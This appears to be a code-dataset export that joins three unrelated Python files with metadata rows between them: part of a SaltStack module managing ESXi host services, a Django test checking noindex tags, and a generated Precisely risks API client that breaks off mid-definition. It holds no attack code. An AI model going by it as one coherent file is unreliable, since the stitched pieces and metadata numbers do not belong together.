"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Stopping the '{}' service on {}.".format(service_name, host_name))
# Stop the service.
try:
service_manager.StopService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_stop' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Stopped": True}})
return ret
def service_restart(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Restart the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to restart the service.
If host_names is not provided, the service will be restarted for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_restart my.esxi.host root bad-password 'ntpd'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_restart my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Restarting the '{}' service on {}.".format(service_name, host_name))
# Restart the service.
try:
service_manager.RestartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_restart' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Restarted": True}})
return ret
def set_service_policy(
host,
username,
password,
service_name,
service_policy,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Set the service name's policy for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
service_policy
The policy to set for the service. For example, 'automatic'.
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to set the service policy.
If host_names is not provided, the service policy information will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.set_service_policy my.esxi.host root bad-password 'ntpd' 'automatic'
# Used for connecting to a vCenter Server
salt '*' vsphere.set_service_policy my.vcenter.location root bad-password 'ntpd' 'automatic' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Services are stored in a general list - we need loop through the list and find
# service key that matches our service name.
for service in services:
service_key = None
# Find the service key based on the given service_name
if service.key == service_name:
service_key = service.key
elif service_name == "ssh" or service_name == "SSH":
if service.key == "TSM-SSH":
service_key = "TSM-SSH"
# If we have a service_key, we've found a match. Update the policy.
if service_key:
try:
service_manager.UpdateServicePolicy(id=service_key, policy=service_policy)
except vim.fault.NotFound:
msg = "The service name '{}' was not found.".format(service_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.HostConfigFault as err:
msg = "'vsphere.set_service_policy' failed for host {}: {}".format(
host_name, err
)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
ret.update({host_name: True})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
def get_service_policy(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Get the service name's policy for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to retrieve the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to get service policy information.
If host_names is not provided, the service policy information will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.get_service_policy my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.get_service_policy my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = salt.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
# Loop through services until we find a matching name
for service in services:
if service.key == temp_service_name:
ret.update({host_name: {service_name: service.policy}})
# We've found a match - break out of the loop so we don't overwrite the
# Updated host_name value with an error message.
break
else:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
ret.update({host_name: {"Error": msg}})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "'vsphere.get_service_policy' failed for host {}.".format(host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
def get_service_running(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Get the service name's running state for a given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to retrieve the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to get the service's running state.
If host_names is not provided, the service's running state will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.get_service_running my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.get_service_running my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = salt.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
# Loop through services until we find a matching name
for service in services:
if service.key == temp_service_name:
ret.update({host_name: {service_name: service.running}})
# We've found a match - break out of the loop so we don't overwrite the
# Updated host_name value with an error message.
break
else:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
ret.update({host_name: {"Error": msg}})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "'vsphere.get_service_running' failed for host {}.".format(host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
| 30.52867 | 102 | 0.5984 | 3,299 | 26,621 | 4.708396 | 0.073356 | 0.059486 | 0.020923 | 0.027361 | 0.908839 | 0.887401 | 0.881607 | 0.872401 | 0.857078 | 0.850705 | 0 | 0.002551 | 0.322753 | 26,621 | 871 | 103 | 30.56372 | 0.859005 | 0.462342 | 0 | 0.801471 | 0 | 0 | 0.114392 | 0.011797 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0.029412 | 0.019608 | 0.002451 | 0.073529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8deb125d5a21859956df51571a725b637e340926 | 1,412 | py | Python | municipal_finance/tests/test_noindex.py | Code4SA/municipal-data-api | 8b213b702245bc2ff1bab4bd160c4cd3b604d54f | [
"MIT"
] | null | null | null | municipal_finance/tests/test_noindex.py | Code4SA/municipal-data-api | 8b213b702245bc2ff1bab4bd160c4cd3b604d54f | [
"MIT"
] | null | null | null | municipal_finance/tests/test_noindex.py | Code4SA/municipal-data-api | 8b213b702245bc2ff1bab4bd160c4cd3b604d54f | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.conf import settings
class TestNoIndex(TestCase):
def test_indexing_is_allowed(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webflow/index.html')
self.assertTrue('<meta name="robots" content="noindex">' not in str(response.content))
self.assertTrue("noindex" not in str(response.content))
response = self.client.get('/infrastructure/projects/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'infrastructure/search.djhtml')
self.assertTrue('<meta name="robots" content="noindex">' not in str(response.content))
self.assertTrue("noindex" not in str(response.content))
def test_indexing_is_blocked(self):
settings.NO_INDEX = "env_bool"
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webflow/index.html')
self.assertTrue('<meta name="robots" content="noindex">' in str(response.content))
response = self.client.get('/infrastructure/projects/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'infrastructure/search.djhtml')
self.assertTrue('<meta name="robots" content="noindex">' in str(response.content)) | 45.548387 | 94 | 0.699717 | 160 | 1,412 | 6.1 | 0.2625 | 0.086066 | 0.079918 | 0.122951 | 0.838115 | 0.838115 | 0.838115 | 0.838115 | 0.838115 | 0.838115 | 0 | 0.010248 | 0.17068 | 1,412 | 31 | 95 | 45.548387 | 0.823228 | 0 | 0 | 0.75 | 0 | 0 | 0.225053 | 0.075018 | 0 | 0 | 0 | 0 | 0.583333 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
30c9e13ff83e1549090894e63e2a1a7fbafadbe2 | 130,591 | py | Python | com/precisely/apis/api/risks_service_api.py | PreciselyData/PreciselyAPIsSDK-Python | 28ffff0c96d81d3a53a5599c987d54d7b632b508 | [
"Apache-2.0"
] | null | null | null | com/precisely/apis/api/risks_service_api.py | PreciselyData/PreciselyAPIsSDK-Python | 28ffff0c96d81d3a53a5599c987d54d7b632b508 | [
"Apache-2.0"
] | null | null | null | com/precisely/apis/api/risks_service_api.py | PreciselyData/PreciselyAPIsSDK-Python | 28ffff0c96d81d3a53a5599c987d54d7b632b508 | [
"Apache-2.0"
] | null | null | null | """
Precisely APIs
Enhance & enrich your data, applications, business processes, and workflows with rich location, information, and identify APIs. # noqa: E501
The version of the OpenAPI document: 11.9.3
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from com.precisely.apis.api_client import ApiClient, Endpoint as _Endpoint
from com.precisely.apis.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from com.precisely.apis.model.crime_risk_by_address_batch_request import CrimeRiskByAddressBatchRequest
from com.precisely.apis.model.crime_risk_by_location_batch_request import CrimeRiskByLocationBatchRequest
from com.precisely.apis.model.crime_risk_response import CrimeRiskResponse
from com.precisely.apis.model.crime_risk_response_list import CrimeRiskResponseList
from com.precisely.apis.model.distance_to_flood_hazard_address_request import DistanceToFloodHazardAddressRequest
from com.precisely.apis.model.distance_to_flood_hazard_location_request import DistanceToFloodHazardLocationRequest
from com.precisely.apis.model.distance_to_flood_hazard_response import DistanceToFloodHazardResponse
from com.precisely.apis.model.earthquake_history import EarthquakeHistory
from com.precisely.apis.model.earthquake_risk_by_address_request import EarthquakeRiskByAddressRequest
from com.precisely.apis.model.earthquake_risk_by_location_request import EarthquakeRiskByLocationRequest
from com.precisely.apis.model.earthquake_risk_response import EarthquakeRiskResponse
from com.precisely.apis.model.earthquake_risk_response_list import EarthquakeRiskResponseList
from com.precisely.apis.model.error_info import ErrorInfo
from com.precisely.apis.model.fire_history import FireHistory
from com.precisely.apis.model.fire_risk_by_address_request import FireRiskByAddressRequest
from com.precisely.apis.model.fire_risk_by_location_request import FireRiskByLocationRequest
from com.precisely.apis.model.fire_risk_response import FireRiskResponse
from com.precisely.apis.model.fire_risk_response_list import FireRiskResponseList
from com.precisely.apis.model.fire_stations import FireStations
from com.precisely.apis.model.flood_risk_by_address_request import FloodRiskByAddressRequest
from com.precisely.apis.model.flood_risk_by_location_request import FloodRiskByLocationRequest
from com.precisely.apis.model.flood_risk_response import FloodRiskResponse
from com.precisely.apis.model.flood_risk_response_list import FloodRiskResponseList
from com.precisely.apis.model.water_body_response import WaterBodyResponse
class RisksServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_crime_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/byaddress',
'operation_id': 'get_crime_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'type',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'type':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'type': 'type',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'type': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_crime_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/byaddress',
'operation_id': 'get_crime_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'crime_risk_by_address_batch_request',
],
'required': [
'crime_risk_by_address_batch_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'crime_risk_by_address_batch_request':
(CrimeRiskByAddressBatchRequest,),
},
'attribute_map': {
},
'location_map': {
'crime_risk_by_address_batch_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_crime_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/bylocation',
'operation_id': 'get_crime_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'type',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'type':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'type': 'type',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'type': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_crime_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/bylocation',
'operation_id': 'get_crime_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'crime_risk_by_location_batch_request',
],
'required': [
'crime_risk_by_location_batch_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'crime_risk_by_location_batch_request':
(CrimeRiskByLocationBatchRequest,),
},
'attribute_map': {
},
'location_map': {
'crime_risk_by_location_batch_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_distance_to_coast_by_address_endpoint = _Endpoint(
settings={
'response_type': (WaterBodyResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/byaddress',
'operation_id': 'get_distance_to_coast_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'max_candidates',
'water_body_type',
'search_distance',
'search_distance_unit',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'max_candidates':
(str,),
'water_body_type':
(str,),
'search_distance':
(str,),
'search_distance_unit':
(str,),
},
'attribute_map': {
'address': 'address',
'max_candidates': 'maxCandidates',
'water_body_type': 'waterBodyType',
'search_distance': 'searchDistance',
'search_distance_unit': 'searchDistanceUnit',
},
'location_map': {
'address': 'query',
'max_candidates': 'query',
'water_body_type': 'query',
'search_distance': 'query',
'search_distance_unit': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_distance_to_coast_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (DistanceToFloodHazardResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/byaddress',
'operation_id': 'get_distance_to_coast_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'distance_to_flood_hazard_address_request',
],
'required': [
'distance_to_flood_hazard_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'distance_to_flood_hazard_address_request':
(DistanceToFloodHazardAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'distance_to_flood_hazard_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_distance_to_coast_by_location_endpoint = _Endpoint(
settings={
'response_type': (WaterBodyResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/bylocation',
'operation_id': 'get_distance_to_coast_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'max_candidates',
'water_body_type',
'search_distance',
'search_distance_unit',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'max_candidates':
(str,),
'water_body_type':
(str,),
'search_distance':
(str,),
'search_distance_unit':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'max_candidates': 'maxCandidates',
'water_body_type': 'waterBodyType',
'search_distance': 'searchDistance',
'search_distance_unit': 'searchDistanceUnit',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'max_candidates': 'query',
'water_body_type': 'query',
'search_distance': 'query',
'search_distance_unit': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_distance_to_coast_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (DistanceToFloodHazardResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/bylocation',
'operation_id': 'get_distance_to_coast_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'distance_to_flood_hazard_location_request',
],
'required': [
'distance_to_flood_hazard_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'distance_to_flood_hazard_location_request':
(DistanceToFloodHazardLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'distance_to_flood_hazard_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_earthquake_history_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeHistory,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquakehistory',
'operation_id': 'get_earthquake_history',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'post_code',
'start_date',
'end_date',
'min_magnitude',
'max_magnitude',
'max_candidates',
],
'required': [
'post_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'post_code':
(str,),
'start_date':
(str,),
'end_date':
(str,),
'min_magnitude':
(str,),
'max_magnitude':
(str,),
'max_candidates':
(str,),
},
'attribute_map': {
'post_code': 'postCode',
'start_date': 'startDate',
'end_date': 'endDate',
'min_magnitude': 'minMagnitude',
'max_magnitude': 'maxMagnitude',
'max_candidates': 'maxCandidates',
},
'location_map': {
'post_code': 'query',
'start_date': 'query',
'end_date': 'query',
'min_magnitude': 'query',
'max_magnitude': 'query',
'max_candidates': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/byaddress',
'operation_id': 'get_earthquake_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'richter_value',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'richter_value':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'richter_value': 'richterValue',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'richter_value': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/byaddress',
'operation_id': 'get_earthquake_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'earthquake_risk_by_address_request',
],
'required': [
'earthquake_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'earthquake_risk_by_address_request':
(EarthquakeRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'earthquake_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_earthquake_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/bylocation',
'operation_id': 'get_earthquake_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'richter_value',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'richter_value':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'richter_value': 'richterValue',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'richter_value': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/bylocation',
'operation_id': 'get_earthquake_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'earthquake_risk_by_location_request',
],
'required': [
'earthquake_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'earthquake_risk_by_location_request':
(EarthquakeRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'earthquake_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_fire_history_endpoint = _Endpoint(
